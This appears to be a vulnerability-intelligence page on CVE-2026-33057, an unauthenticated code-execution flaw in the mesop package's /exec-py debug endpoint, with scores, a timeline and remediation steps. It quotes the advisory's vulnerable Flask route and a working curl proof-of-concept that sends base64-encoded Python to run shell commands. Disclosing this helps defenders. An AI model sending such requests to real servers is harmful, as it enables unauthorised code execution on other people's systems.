What is the CVSS score of CVE-2026-33057?

CVE-2026-33057 has a CVSS 3.1 base score of 9.8 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. EPSS exploitation probability: 0.3%.

Which versions of Python are affected by CVE-2026-33057?

A critical remote code execution vulnerability in the mesop Python package allows attackers to execute arbitrary code on exposed systems without authentication.. A patch is available.

Is there a public PoC exploit available for CVE-2026-33057?

Yes, a public proof-of-concept exploit is available for CVE-2026-33057. Prioritise patching immediately. EPSS: 0.3%.

How to fix or mitigate CVE-2026-33057?

Within 24 hours: Identify all systems running mesop and determine if the /exec-py endpoint is accessible from untrusted networks; immediately restrict network access if exposed. Within 7 days: Remove mesop from production environments or disable the debugging Flask server entirely; evaluate alternative solutions. Within 30 days: Complete migration away from mesop, implement software supply chain review processes to prevent future vulnerable dependencies, and conduct forensic analysis of any exposed systems for signs of compromise.

Python CVE-2026-33057

CRITICAL

Code Injection (CWE-94)

2026-03-18 https://github.com/mesop-dev/mesop

GHSA-gjgx-rvqr-6w6v

Command Injection Python RCE Code Injection

9.8

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

9.8 CRITICAL

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Patch released

Mar 31, 2026 - 21:13 nvd

Patch available

Analysis Generated

Mar 18, 2026 - 20:15 vuln.today

CVE Published

Mar 18, 2026 - 20:05 nvd

CRITICAL 9.8

DescriptionGitHub Advisory

Summary

An explicit web endpoint inside the ai/ testing module infrastructure directly ingests untrusted Python code strings unconditionally without authentication measures, yielding standard Unrestricted Remote Code Execution. Any individual capable of routing HTTP logic to this server block will gain explicit host-machine command rights.

Details

The AI codebase package includes a lightweight debugging Flask server inside ai/sandbox/wsgi_app.py. The /exec-py route accepts base_64 encoded raw string payloads inside the code parameter natively evaluated by a basic POST web request. It saves it rapidly to the operating system logic path and injects it recursively using execute_module(module_path...).

python

# ai/sandbox/wsgi_app.py
@flask_app.route("/exec-py", methods=["POST"])
def exec_py_route():
  code = base64.urlsafe_b64decode(request.form.get("code"))
# ... code is blindly written to file and forcefully executed

PoC

bash

# Payload:
# import os
# os.system('echo "pwned by attacker" > /tmp/pwned.txt')
#
# Base64 string represents the identical payload block above:
# aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ==

curl -X POST http://<target_ip_address_hosting_sandbox>:port/exec-py \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "code=aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ=="
# Validate exploitation target execution natively:
# $ cat /tmp/pwned.txt
# pwned by attacker

Impact

This presents trivial severity for systems publicly exposed or lacking strictly verified boundary firewalls due to absolute unauthenticated command injection privileges targeting the direct execution interpreter running this service sandbox.

AnalysisAI

An unauthenticated remote code execution vulnerability exists in the mesop Python package's debugging Flask server endpoint (/exec-py) that accepts and executes arbitrary base64-encoded Python code without any authentication or validation. The vulnerability affects the mesop pip package, with a publicly disclosed proof-of-concept demonstrating trivial exploitation requiring only a single HTTP POST request. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Send HTTP POST request to /exec-py endpoint

Exploit

Submit base64-encoded Python code in parameter

Execution

Flask server decodes and evaluates code

Impact

Execute arbitrary commands with host privileges

Access

Send HTTP POST request to /exec-py endpoint

Exploit

Submit base64-encoded Python code in parameter

Execution

Flask server decodes and evaluates code

Impact

Execute arbitrary commands with host privileges

Vulnerability AssessmentAI

Exploitation	Remote unauthenticated attacker can exploit the `/exec-py` endpoint in the AI package's `ai/sandbox/wsgi_app.py` Flask debugging server if it is exposed on the network. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	This vulnerability represents a critical real-world risk demanding immediate attention. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker scans internet-facing systems for exposed Flask debug servers running mesop's sandbox module, identifying the /exec-py endpoint through port scanning or exposed configuration. The attacker crafts a base64-encoded Python payload containing reverse shell commands or credential harvesting scripts and submits it via a simple curl POST request to the /exec-py route without any authentication. …
Remediation	Immediately disable and remove the ai/sandbox/wsgi_app.py debugging Flask server from all production environments and any systems accessible from untrusted networks. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all systems running mesop and determine if the /exec-py endpoint is accessible from untrusted networks; immediately restrict network access if exposed. …

Threat intelligence, references, and detailed analysis are available after sign-in.